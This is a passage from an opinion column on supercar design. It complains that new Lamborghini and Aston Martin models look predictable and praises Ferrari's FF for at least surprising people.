And it’s a fine looking machine, one that I’m sure will appear on posters adorning teenage bedrooms the world over.
But is anyone really wowed by the images dribbling out of Sant’Agata? When you first clapped eyes on the Murcielago replacement, did you say to yourself “goodness gracious, I certainly wasn’t expecting that?” No, you didn’t. And that’s starting to annoy me.
I’m not having a go purely at Lamborghini here, it’s far from just them. Look at Aston Martin, who have been recycling the same (admittedly very pretty) design for donkeys’ years now. When images of the Virage landed, who can honestly say they did a double take in surprise?
I understand why. So much money goes into these new machines that to design a vehicle that people hate the looks of would be a disaster. So the management board play it safe, urging restraint from their designers and opting for evolution of proven hits, rather than revolution. I get the business case, but for supercars, surely that’s the playground for designers to run wild and free, spouting crazy wings and lines the likes of which we’ve never seen.
Ferrari’s new FF has divided opinion over its looks, but at least it’s provoked a reaction. Not that many people could reasonably have expected a four-wheel drive shooting brake, and it’s the first time in a while that my jaw has come anywhere close to dropping in surprise.
Whether or not I like the FF is irrelevant, but it at least stirred me from the stupor that modern new releases have left me in. Weeks of tantalising teaser shots, followed by an ultimately anticlimactic reveal, mean I rarely get excited about the prospect of anything new these days. And that makes the poster-hanging little boy in me sad.
